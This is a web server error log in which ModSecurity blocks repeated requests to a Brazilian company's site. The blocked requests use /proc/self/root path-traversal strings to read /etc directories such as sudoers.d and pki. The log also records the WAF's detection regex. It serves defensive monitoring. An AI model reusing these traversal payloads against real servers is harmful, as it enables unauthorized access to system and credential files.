[Wed Mar 18 09:10:45.191257 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:51104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWReoXxyEfFpUF8f9eKwAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:47.467911 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:51108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWR_u8EFLIOrSqIpv03wAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:49.344839 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:49678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWSdY0UrI5A3LftIySzQAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:10:50.664330 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:42722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWSimAPhZkrhU8w4ldPAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:10:53.111753 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:33432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWTew_le52K8_3pV3PcQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:10:55.539718 2026] [mime_magic:error] [pid 17653:tid 140411683178240] (70014)End of file found: [client 74.7.243.128:42730] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var
[Wed Mar 18 09:11:00.411037 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.241.31:33438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWVEzinOy1jxa1j4cDzAAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:08.282925 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:33224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWXOyqAr6etmhZHNquQwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:11.682972 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:43492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWX-w_le52K8_3pV3PhAAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:14.727732 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:43496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWYtY0UrI5A3LftIyS6gAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:31.558066 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:42732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWc9Y0UrI5A3LftIyS9gAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:11:32.866003 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:60300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWdNY0UrI5A3LftIyS-QAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:11:35.927118 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:60306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWd9Y0UrI5A3LftIyTAAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:11:38.426298 2026] [mime_magic:error] [pid 15826:tid 140411574073088] (70014)End of file found: [client 57.141.18.16:42620] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:11:39.075625 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:43500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWe-w_le52K8_3pV3PpgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:41.389877 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.241.31:41154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWfUzinOy1jxa1j4cD4QAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:47.827192 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:41158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWg9Y0UrI5A3LftIyTFAAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:50.262524 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:58058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWhtY0UrI5A3LftIyTGwAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:51.662860 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:58064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWh-oXxyEfFpUF8f9eRQAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:54.039866 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:58074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWiuyqAr6etmhZHNquWAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:55.407923 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:58084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWi0zinOy1jxa1j4cD5wAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:56.724832 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.241.31:58094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWjEzinOy1jxa1j4cD6AAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:11:59.203816 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:46878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWj0zinOy1jxa1j4cD6wAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:12:01.182019 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:46890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqWkPu8EFLIOrSqIpv1FgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
